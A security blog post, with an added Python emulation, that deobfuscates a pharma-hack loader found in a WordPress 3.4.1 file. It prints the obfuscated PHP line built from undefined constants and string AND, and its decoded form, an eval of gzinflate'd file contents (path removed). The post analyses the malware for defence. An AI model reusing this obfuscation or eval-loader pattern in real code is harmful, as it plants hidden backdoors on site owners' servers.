Tag Archives: Pharma Hack

Convert random-looking string into readable PHP, using bitwise operator, to reveal pharma hack

Today I came across an interesting piece of code in an archived WordPress 3.4.1 installation. At first it didn’t make much sense, but after careful examination, it wasn’t so random after all — malicious code never is.

It looked something like this:

$lang = 'e~o~*'.Twzinf.'~g|u('.vylu_g.'}'.w_konum.'~'.wsjf.':))o{'&uwal.'|bo~'.onn

There’s a variable called $lang consisting of several strings (e~o~*, ~g|u(, }) and constants (Twzinf, vylu_g, w_konum), but the thing is, those constants aren’t defined anywhere, so what is their purpose? In any event, the worst case scenario is that there is a variable with some gibberish, neatly tucked away in wp-includes/load.php, right?

Nope, otherwise this would conclude the blog post :).

Before we break down what this seemingly random piece of code does, here is what it actually looks like once PHP executes it:

$lang = eval(@gzinflate(file_get_contents("")));

I’ve removed the actual file path within the quotation marks, but you can immediately tell how dangerous this is, because it retrieves contents from an unknown file on the server, uncompresses it, and then executes whatever the file contains with no questions asked.

That’s a problem.

Let’s look at how PHP got there.
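To see the mechanism without running anything from the infected site, here is an added Python emulation (not the post's own code) of how PHP before 8.0 evaluates that assignment: undefined constants such as Twzinf evaluate to their own names as strings, `.` concatenates each side, and `&` then ANDs the two strings byte by byte, truncating to the shorter one. Only the operand pieces visible in the excerpt above are used; the right-hand operand is cut off on the page, so the recovered text is just the first eleven characters of the decoded statement.

```python
# Added example: emulate PHP < 8 evaluation of the obfuscated $lang expression
# so the hidden text can be recovered offline, without executing the sample.
from typing import List, Tuple

# Pieces exactly as the archived source shows them. Bare words are undefined
# constants; PHP before 8.0 evaluates an undefined constant to its own name
# (with a notice), which is the trick that turns "gibberish" into operands.
LEFT_PIECES: List[Tuple[str, str]] = [
    ("str", "e~o~*"), ("const", "Twzinf"), ("str", "~g|u("), ("const", "vylu_g"),
    ("str", "}"), ("const", "w_konum"), ("str", "~"), ("const", "wsjf"),
    ("str", ":))o{"),
]
# The right-hand operand is truncated in the excerpt; only these three pieces
# are visible, so the decoded output is correspondingly short.
RIGHT_PIECES: List[Tuple[str, str]] = [
    ("const", "uwal"), ("str", "|bo~"), ("const", "onn"),
]


def php_concat(pieces: List[Tuple[str, str]]) -> str:
    """Emulate PHP's '.' over quoted strings and (PHP < 8) undefined constants."""
    return "".join(text for _kind, text in pieces)


def php_string_and(a: str, b: str) -> str:
    """Emulate PHP's bitwise '&' on two strings: byte-wise AND, with the result
    truncated to the length of the shorter operand."""
    pairs = zip(a.encode("latin-1"), b.encode("latin-1"))
    return bytes(x & y for x, y in pairs).decode("latin-1")


def deobfuscate(left: List[Tuple[str, str]], right: List[Tuple[str, str]]) -> str:
    """'.' binds tighter than '&' in PHP, so each side is concatenated first
    and only then are the two strings ANDed together."""
    return php_string_and(php_concat(left), php_concat(right))


if __name__ == "__main__":
    print(deobfuscate(LEFT_PIECES, RIGHT_PIECES))  # eval(@gzinf
```

On PHP 8.0 and later an undefined constant throws an Error instead of yielding its name, so this particular layer of the obfuscation only works on older interpreters such as the one that shipped with a WordPress 3.4.1-era host.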
